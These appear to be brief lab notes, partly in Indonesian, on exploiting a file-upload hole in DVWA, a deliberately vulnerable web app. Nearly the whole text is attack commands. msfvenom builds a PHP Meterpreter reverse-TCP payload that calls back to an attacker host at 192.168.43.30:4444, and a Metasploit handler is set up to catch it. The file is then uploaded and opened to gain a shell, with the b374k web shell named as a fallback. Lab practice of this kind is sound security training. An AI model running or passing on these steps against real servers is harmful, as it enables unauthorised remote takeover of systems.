Upload Vuln

mkdir -p /root/backdoor
cd /root/backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.30 LPORT=4444 R > PHONE_HOME.php
ls -l PHONE_HOME.php
vi PHONE_HOME.php

-> Press "x" to delete the "#" character on the first line.
atau intinya dihapus komentar diawal

msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.43.30
set LPORT 4444
exploit

buka browser, upload PHONE_HOME.php

http://192.168.43.207/dvwa/hackable/uploads/

atau copy source,
lalu klik PHONE_HOME.php

kembali ke kali linux

ini adalah alternatif jika b374k.php ditolak